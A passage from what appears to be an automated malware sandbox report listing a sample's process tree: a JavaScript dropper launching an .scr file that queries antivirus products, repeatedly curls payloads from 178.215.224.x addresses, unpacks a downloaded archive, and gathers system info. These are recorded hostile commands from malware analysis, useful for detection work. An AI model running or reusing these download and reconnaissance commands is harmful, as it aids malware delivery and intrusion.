                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:13
                                      Start time:06:04:00
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:15
                                      Start time:06:04:14
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\wscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js"
                                      Imagebase:0x7ff61b7d0000
                                      File size:170'496 bytes
                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:16
                                      Start time:06:04:14
                                      Start date:24/11/2024
                                      Path:C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr" "C:\Users\user\AppData\Local\InnoSphere Dynamics\l"
                                      Imagebase:0xe30000
                                      File size:947'288 bytes
                                      MD5 hash:62D09F076E6E0240548C2F837536A46A
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Has exited:true

                                      Target ID:17
                                      Start time:06:04:20
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\user\AppData\Local\temp\407 2>&1
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:18
                                      Start time:06:04:20
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:19
                                      Start time:06:04:21
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                      Wow64 process (32bit):true
                                      Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
                                      Imagebase:0x3f0000
                                      File size:427'008 bytes
                                      MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:20
                                      Start time:06:04:23
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\407 > C:\Users\user\AppData\Local\temp\403
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:21
                                      Start time:06:04:23
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:22
                                      Start time:06:04:23
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"
                                      Imagebase:0x7ff6068e0000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:23
                                      Start time:06:04:23
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:24
                                      Start time:06:04:23
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\curl.exe
                                      Wow64 process (32bit):true
                                      Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"
                                      Imagebase:0x650000
                                      File size:470'528 bytes
                                      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:26
                                      Start time:06:04:51
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6"
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:27
                                      Start time:06:04:51
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:28
                                      Start time:06:04:51
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\curl.exe
                                      Wow64 process (32bit):true
                                      Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6"
                                      Imagebase:0x650000
                                      File size:470'528 bytes
                                      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:29
                                      Start time:06:04:53
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5"
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:30
                                      Start time:06:04:53
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:31
                                      Start time:06:04:53
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\curl.exe
                                      Wow64 process (32bit):true
                                      Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5"
                                      Imagebase:0x650000
                                      File size:470'528 bytes
                                      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:32
                                      Start time:06:04:55
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\vuevs" "178.215.224.74/v10/ukyh.php?jspo=6"
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:33
                                      Start time:06:04:55
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:34
                                      Start time:06:04:55
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\curl.exe
                                      Wow64 process (32bit):true
                                      Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\vuevs" "178.215.224.74/v10/ukyh.php?jspo=6"
                                      Imagebase:0x650000
                                      File size:470'528 bytes
                                      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:35
                                      Start time:06:04:56
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fsqyf" "178.215.224.74/v10/ukyh.php?jspo=6"
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:36
                                      Start time:06:04:56
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:37
                                      Start time:06:04:56
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\curl.exe
                                      Wow64 process (32bit):true
                                      Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\fsqyf" "178.215.224.74/v10/ukyh.php?jspo=6"
                                      Imagebase:0x650000
                                      File size:470'528 bytes
                                      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:38
                                      Start time:06:04:58
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dmgfe" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:39
                                      Start time:06:04:58
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:40
                                      Start time:06:04:58
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\curl.exe
                                      Wow64 process (32bit):true
                                      Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\dmgfe" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
                                      Imagebase:0x650000
                                      File size:470'528 bytes
                                      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:41
                                      Start time:06:05:01
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\woejq" "178.215.224.74/v10/ukyh.php?jspo=6"
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:42
                                      Start time:06:05:01
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:43
                                      Start time:06:05:01
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\curl.exe
                                      Wow64 process (32bit):true
                                      Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\woejq" "178.215.224.74/v10/ukyh.php?jspo=6"
                                      Imagebase:0x650000
                                      File size:470'528 bytes
                                      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:44
                                      Start time:06:05:03
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\xvway" "178.215.224.74/v10/ukyh.php?jspo=6"
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:45
                                      Start time:06:05:03
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:46
                                      Start time:06:05:03
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\curl.exe
                                      Wow64 process (32bit):true
                                      Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\xvway" "178.215.224.74/v10/ukyh.php?jspo=6"
                                      Imagebase:0x650000
                                      File size:470'528 bytes
                                      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:47
                                      Start time:06:05:05
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tlbry" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:48
                                      Start time:06:05:05
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff757150000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:49
                                      Start time:06:05:05
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\curl.exe
                                      Wow64 process (32bit):true
                                      Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\tlbry" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
                                      Imagebase:0x650000
                                      File size:470'528 bytes
                                      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:50
                                      Start time:06:05:10
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /C cd "C:\Users\user\AppData\Roaming\DolphinDumps" & azvw.exe -o xhwq.zip
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:51
                                      Start time:06:05:10
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:52
                                      Start time:06:05:10
                                      Start date:24/11/2024
                                      Path:C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
                                      Wow64 process (32bit):true
                                      Commandline:azvw.exe -o xhwq.zip
                                      Imagebase:0x400000
                                      File size:167'936 bytes
                                      MD5 hash:75375C22C72F1BEB76BEA39C22A1ED68
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Has exited:true

                                      Target ID:53
                                      Start time:06:05:11
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\sirxu" "178.215.224.74/v10/ukyh.php?jspo=6"
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:54
                                      Start time:06:05:11
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:55
                                      Start time:06:05:11
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\curl.exe
                                      Wow64 process (32bit):true
                                      Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\sirxu" "178.215.224.74/v10/ukyh.php?jspo=6"
                                      Imagebase:0x650000
                                      File size:470'528 bytes
                                      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:56
                                      Start time:06:05:12
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gtnez" "178.215.224.74/v10/ukyh.php?jspo=31"
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:57
                                      Start time:06:05:12
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:58
                                      Start time:06:05:12
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\curl.exe
                                      Wow64 process (32bit):true
                                      Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\gtnez" "178.215.224.74/v10/ukyh.php?jspo=31"
                                      Imagebase:0x650000
                                      File size:470'528 bytes
                                      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:59
                                      Start time:06:05:14
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:60
                                      Start time:06:05:14
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:61
                                      Start time:06:05:14
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\systeminfo.exe
                                      Wow64 process (32bit):true
                                      Commandline:systeminfo
                                      Imagebase:0x9f0000
                                      File size:76'800 bytes
                                      MD5 hash:36CCB1FFAFD651F64A22B5DA0A1EA5C5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:62
                                      Start time:06:05:14
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\findstr.exe
                                      Wow64 process (32bit):true
                                      Commandline:findstr /C:"OS Name"
                                      Imagebase:0xb80000
                                      File size:29'696 bytes
                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:63
                                      Start time:06:05:14
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                      Imagebase:0x820000
                                      File size:418'304 bytes
                                      MD5 hash:64ACA4F48771A5BA50CD50F2410632AD
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:64
                                      Start time:06:05:17
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gfdap" "178.215.224.74/v10/ukyh.php?jspo=6"
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:65
                                      Start time:06:05:17
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:66
                                      Start time:06:05:17
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\curl.exe
                                      Wow64 process (32bit):true
                                      Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\gfdap" "178.215.224.74/v10/ukyh.php?jspo=6"
                                      Imagebase:0x650000
                                      File size:470'528 bytes
                                      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:67
                                      Start time:06:05:20
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gjmcf" "178.215.224.74/v10/ukyh.php?jspo=6"
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:68
                                      Start time:06:05:20
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:69
                                      Start time:06:05:21
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\curl.exe
                                      Wow64 process (32bit):true
                                      Commandline:curl -s -o "C:\Users\user\AppData\Local\temp\gjmcf" "178.215.224.74/v10/ukyh.php?jspo=6"
                                      Imagebase:0x650000
                                      File size:470'528 bytes
                                      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:70
                                      Start time:06:05:23
                                      Start date:24/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\lkufr" "178.215.224.74/v10/ukyh.php?jspo=7"
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:71
                                      Start time:06:05:23
                                      Start date:24/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:72
                                      Start time:06:05:23
                                      Start date:24/11/2024
